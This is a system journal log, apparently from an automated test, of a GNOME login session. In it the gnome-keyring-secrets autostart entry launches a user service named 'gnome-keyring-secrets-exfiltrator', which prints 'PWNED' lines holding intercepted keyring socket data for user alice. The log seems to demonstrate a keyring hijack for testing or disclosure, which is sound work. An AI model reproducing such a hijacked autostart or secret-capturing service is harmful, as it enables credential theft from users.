machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App1 app-id:org.gnome.Shell.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase INITIALIZATION
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App12 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App12 app-id:org.gnome.SettingsDaemon.Sharing.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App15 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App15 app-id:org.gnome.SettingsDaemon.UsbProtection.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App3 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App3 app-id:org.gnome.SettingsDaemon.Color.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App6 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase EARLY_INITIALIZATION
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App6 app-id:org.gnome.SettingsDaemon.Keyboard.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App9 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App9 app-id:org.gnome.SettingsDaemon.PrintNotifications.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App10 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App10 app-id:org.gnome.SettingsDaemon.Rfkill.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App13 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App13 app-id:org.gnome.SettingsDaemon.Smartcard.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App16 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App16 app-id:org.gnome.SettingsDaemon.Wacom.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App4 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App4 app-id:org.gnome.SettingsDaemon.Datetime.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App7 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App7 app-id:org.gnome.SettingsDaemon.MediaKeys.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase PRE_DISPLAY_SERVER
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App24 app-id:xdg-user-dirs.desktop is-disabled:0 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App11 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App11 app-id:org.gnome.SettingsDaemon.ScreensaverProxy.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App14 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App14 app-id:org.gnome.SettingsDaemon.Sound.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App2 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App2 app-id:org.gnome.SettingsDaemon.A11ySettings.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App17 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App17 app-id:org.gnome.SettingsDaemon.XSettings.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App5 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App5 app-id:org.gnome.SettingsDaemon.Housekeeping.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App33 app-id:at-spi-dbus-bus.desktop is-disabled:0 is-conditionally-disabled:1
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App8 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App25 app-id:gnome-keyring-pkcs11.desktop is-disabled:0 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App8 app-id:org.gnome.SettingsDaemon.Power.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App32 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App32 app-id:org.gnome.SettingsDaemon.Wwan.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase WINDOW_MANAGER
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase PANEL
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase DESKTOP
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase APPLICATION
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App35 app-id:orca-autostart.desktop is-disabled:0 is-conditionally-disabled:1
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: starting phase EARLY_INITIALIZATION
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App18 app-id:gnome-keyring-secrets.desktop is-disabled:0 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App27 app-id:gnome-keyring-ssh.desktop is-disabled:0 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase DISPLAY_SERVER
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App1 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App1 app-id:org.gnome.Shell.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase INITIALIZATION
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App12 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App12 app-id:org.gnome.SettingsDaemon.Sharing.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App15 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App15 app-id:org.gnome.SettingsDaemon.UsbProtection.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App3 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App3 app-id:org.gnome.SettingsDaemon.Color.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App6 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App6 app-id:org.gnome.SettingsDaemon.Keyboard.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App9 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App9 app-id:org.gnome.SettingsDaemon.PrintNotifications.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App10 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App10 app-id:org.gnome.SettingsDaemon.Rfkill.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App13 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App13 app-id:org.gnome.SettingsDaemon.Smartcard.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App16 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App16 app-id:org.gnome.SettingsDaemon.Wacom.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App4 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App4 app-id:org.gnome.SettingsDaemon.Datetime.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App7 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App7 app-id:org.gnome.SettingsDaemon.MediaKeys.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App24 app-id:xdg-user-dirs.desktop is-disabled:0 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App11 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App11 app-id:org.gnome.SettingsDaemon.ScreensaverProxy.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App14 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App14 app-id:org.gnome.SettingsDaemon.Sound.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App2 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App2 app-id:org.gnome.SettingsDaemon.A11ySettings.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ending phase EARLY_INITIALIZATION
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: starting phase PRE_DISPLAY_SERVER
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: starting app '/org/gnome/SessionManager/App25'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Starting app: /org/gnome/SessionManager/App25
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: starting gnome-keyring-pkcs11.desktop: command=/run/wrappers/bin/gnome-keyring-daemon --start --components=pkcs11 startup-id=1051489d99d487bf871722599376281700000010760024
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App17 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App17 app-id:org.gnome.SettingsDaemon.XSettings.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App5 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App5 app-id:org.gnome.SettingsDaemon.Housekeeping.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App33 app-id:at-spi-dbus-bus.desktop is-disabled:0 is-conditionally-disabled:1
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App8 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App8 app-id:org.gnome.SettingsDaemon.Power.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App32 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App32 app-id:org.gnome.SettingsDaemon.Wwan.desktop is-disabled:1 is-conditionally-disabled:0
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase WINDOW_MANAGER
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase PANEL
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase DESKTOP
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: Phase APPLICATION
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ID: /org/gnome/SessionManager/App35 app-id:orca-autostart.desktop is-disabled:0 is-conditionally-disabled:1
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: starting phase EARLY_INITIALIZATION
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: ending phase EARLY_INITIALIZATION
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: starting phase PRE_DISPLAY_SERVER
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: starting app '/org/gnome/SessionManager/App25'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): Starting app: /org/gnome/SessionManager/App25
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: starting gnome-keyring-pkcs11.desktop: command=/run/wrappers/bin/gnome-keyring-daemon --start --components=pkcs11 startup-id=1051489d99d487bf871722599376281700000010760024
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: started pid:1082
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: starting app '/org/gnome/SessionManager/App18'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Starting app: /org/gnome/SessionManager/App18
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: starting gnome-keyring-secrets.desktop: command=systemctl start --user gnome-keyring-secrets-exfiltrator startup-id=1051489d99d487bf87172259937599940700000010760017
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: started pid:1082
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: starting app '/org/gnome/SessionManager/App18'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): Starting app: /org/gnome/SessionManager/App18
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: starting gnome-keyring-secrets.desktop: command=systemctl start --user gnome-keyring-secrets-exfiltrator startup-id=1051489d99d487bf87172259937599940700000010760017
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: started pid:1087
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: starting app '/org/gnome/SessionManager/App27'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): Starting app: /org/gnome/SessionManager/App27
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: starting gnome-keyring-ssh.desktop: command=/run/wrappers/bin/gnome-keyring-daemon --start --components=ssh startup-id=1051489d99d487bf871722599376353200000010760026
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: started pid:1087
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: starting app '/org/gnome/SessionManager/App27'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): Starting app: /org/gnome/SessionManager/App27
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: starting gnome-keyring-ssh.desktop: command=/run/wrappers/bin/gnome-keyring-daemon --start --components=ssh startup-id=1051489d99d487bf871722599376353200000010760026
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: started pid:1090
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: started pid:1090
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: GnomeDesktop-DEBUG(+): Created transient scope for PID 1082
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: GnomeDesktop-DEBUG(+): Created transient scope for PID 1082
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: GnomeDesktop-DEBUG(+): Created transient scope for PID 1087
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: GnomeDesktop-DEBUG(+): Created transient scope for PID 1087
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: GnomeDesktop-DEBUG(+): Created transient scope for PID 1090
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: GnomeDesktop-DEBUG(+): Created transient scope for PID 1090
machine # Aug 02 11:49:36 machine systemd[995]: Started Application launched by gnome-session-binary.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 95.
machine # Aug 02 11:49:36 machine systemd[995]: Started Application launched by gnome-session-binary.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 99.
machine # Aug 02 11:49:36 machine systemd[995]: Started Application launched by gnome-session-binary.
machine # ░░ Subject: A start job for unit UNIT has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit UNIT has finished successfully.
machine # ░░
machine # ░░ The job identifier is 103.
machine # Aug 02 11:49:36 machine 440fsax2c627lm75ifmx5ya2bvk0nhp2-gnome-keyring-secrets-exfiltrator[1032]: PWNED: 'b'\x00\x00\x00\x00\xef\x00\x00\x00\x00\x00\x00\x00\x06pkcs11\x00\x00\x00\x06\x00\x00\x005DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus\x00\x00\x00CDESKTOP_AUTOSTART_ID=1051489d99d487bf871722599376281700000010760024\x00\x00\x00\x10LANG=en_US.UTF-8\x00\x00\x00\x1eXDG_RUNTIME_DIR=/run/user/1000\x00\x00\x00\rLOGNAME=alice\x00\x00\x00\x0eUSERNAME=alice''
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: (pid:1087) done (status:0)
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): GsmAutostartApp: (pid:1087) done (status:0)
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): App gnome-keyring-secrets.desktop exited successfully
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: DEBUG(+): App gnome-keyring-secrets.desktop exited successfully
machine # Aug 02 11:49:36 machine 440fsax2c627lm75ifmx5ya2bvk0nhp2-gnome-keyring-secrets-exfiltrator[1032]: PWNED: 'b'\x00\x00\x00\x00\xec\x00\x00\x00\x00\x00\x00\x00\x03ssh\x00\x00\x00\x06\x00\x00\x005DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus\x00\x00\x00CDESKTOP_AUTOSTART_ID=1051489d99d487bf871722599376353200000010760026\x00\x00\x00\x10LANG=en_US.UTF-8\x00\x00\x00\x1eXDG_RUNTIME_DIR=/run/user/1000\x00\x00\x00\rLOGNAME=alice\x00\x00\x00\x0eUSERNAME=alice''
machine # Aug 02 11:49:44 machine gdm[929]: accountsservice: ActUserManager: sending user-changed signal for user alice
machine # Aug 02 11:49:44 machine gdm[929]: accountsservice: ActUserManager: sent user-changed signal for user alice
machine # Aug 02 11:49:44 machine gdm[929]: accountsservice: ActUserManager: updating user alice
machine # Aug 02 11:49:44 machine gdm-autologin][937]: accountsservice: ActUserManager: sending user-changed signal for user alice
machine # Aug 02 11:49:44 machine gdm-autologin][937]: accountsservice: ActUserManager: sent user-changed signal for user alice
machine # Aug 02 11:49:44 machine gdm-autologin][937]: accountsservice: ActUserManager: updating user alice
machine # Aug 02 11:49:45 machine gdm-autologin][937]: accountsservice: ActUserManager: sending user-changed signal for user alice
machine # Aug 02 11:49:45 machine gdm-autologin][937]: accountsservice: ActUserManager: sent user-changed signal for user alice
machine # Aug 02 11:49:45 machine gdm-autologin][937]: accountsservice: ActUserManager: updating user alice
machine # Aug 02 11:49:45 machine gdm[929]: accountsservice: ActUserManager: sending user-changed signal for user alice
machine # Aug 02 11:49:45 machine gdm[929]: accountsservice: ActUserManager: sent user-changed signal for user alice
machine # Aug 02 11:49:45 machine gdm[929]: accountsservice: ActUserManager: updating user alice
machine # Aug 02 11:49:45 machine systemd[1]: NetworkManager-dispatcher.service: Deactivated successfully.
machine # ░░ Subject: Unit succeeded
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ The unit NetworkManager-dispatcher.service has successfully entered the 'dead' state.
machine # Aug 02 11:50:04 machine systemd[1]: systemd-hostnamed.service: Deactivated successfully.
machine # ░░ Subject: Unit succeeded
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ The unit systemd-hostnamed.service has successfully entered the 'dead' state.
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: WARNING: Application 'gnome-keyring-ssh.desktop' failed to register before timeout
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: WARNING: Application 'gnome-keyring-pkcs11.desktop' failed to register before timeout
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ending phase PRE_DISPLAY_SERVER
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: starting phase DISPLAY_SERVER
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App1 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App1
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: ending phase DISPLAY_SERVER
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: starting phase INITIALIZATION
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): app /org/gnome/SessionManager/App12 is disabled by X-GNOME-HiddenUnderSystemd
machine # Aug 02 11:51:06 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: Skipping disabled app: /org/gnome/SessionManager/App12
